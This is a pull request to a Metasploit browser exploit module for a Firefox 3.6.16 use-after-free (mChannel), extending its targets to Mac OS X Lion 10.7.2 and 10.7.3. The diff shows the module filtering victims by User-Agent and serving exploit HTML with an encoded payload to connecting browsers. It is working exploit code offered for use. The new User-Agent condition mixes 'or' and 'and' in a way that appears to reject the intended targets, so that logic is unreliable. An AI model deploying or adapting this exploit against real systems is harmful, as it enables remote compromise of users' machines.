### PR TITLE
Modified (and tested) to work on Lion 10.7.2 and 10.7.3

### DIFF
--- a/modules/exploits/osx/browser/mozilla_mchannel.rb
+++ b/modules/exploits/osx/browser/mozilla_mchannel.rb
@@ -31,14 +31,14 @@ class Metasploit3 < Msf::Exploit::Remote
 				OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel
 				becomes a dangling pointer and can be reused when setting the OBJECTs
 				data attribute. (Discovered by regenrecht). Mac OS X version by argp,
-				tested on Mac OS X 10.6.6, 10.6.7 and 10.6.8.
+				tested on Mac OS X 10.6.6, 10.6.7, 10.6.8, 10.7.2 and 10.7.3.
 			},
 			'License'        => MSF_LICENSE,
 			'Author'         =>
 				[
 					'regenrecht',                       # discovery
 					'Rh0',                              # windows metasploit module
-					'argp <argp[at]census-labs.com>'    # mac os x target
+					'argp <argp[at]census-labs.com>'    # mac os x version
 				],
 			'References'     =>
 				[
@@ -55,7 +55,8 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Targets'        =>
 				[
 					[
-						'Firefox 3.6.16 on Mac OS X (10.6.6, 10.6.7 and 10.6.8)',
+						# Firefox 3.6.16 on Lion runs as a 32-bit process
+						'Firefox 3.6.16 on Mac OS X (10.6.6, 10.6.7, 10.6.8, 10.7.2 and 10.7.3)',
 						{
 							'Arch' => ARCH_X86,
 							'Fakevtable' => 0x2727,
@@ -69,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def on_request_uri(cli, request)
-		# Random JavaScript variable names
+		# random javascript variable names
 		js_element_name      = rand_text_alpha(rand(10) + 5)
 		js_obj_addr_name     = rand_text_alpha(rand(10) + 5)
 		js_sc_name           = rand_text_alpha(rand(10) + 5)
@@ -82,13 +83,13 @@ class Metasploit3 < Msf::Exploit::Remote
 		# check for non vulnerable targets
 		agent = request.headers['User-Agent']
 
-		if agent !~ /Intel Mac OS X 10\.6/ and agent !~ /Firefox\/3\.6\.16/
+		if agent !~ /Intel Mac OS X 10\.6/ or agent !~ /Intel Mac OS X 10\.7/ and agent !~ /Firefox\/3\.6\.16/
 			vprint_error("Target not supported: #{agent}")
 			send_not_found(cli)
 			return
 		end
 
-		# Re-generate the payload
+		# re-generate the payload
 		return if ((payload = regenerate_payload(cli).encoded) == nil)
 
 		payload_buf  = ''
@@ -147,12 +148,12 @@ class Metasploit3 < Msf::Exploit::Remote
 		</html>
 		HTML
 
-		#Remove the extra tabs
+		# remove the extra tabs
 		html = html.gsub(/^\t\t/, '')
 		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
 		send_response_html(cli, html, { 'Content-Type' => 'text/html' })
 
-		# Handle the payload
+		# handle the payload
 		handler(cli)
 	end
 


### PR DESCRIPTION
Firefox 3.6.16 on Lion runs as a 32-bit process so the exploit works pretty much as my original OS X version.
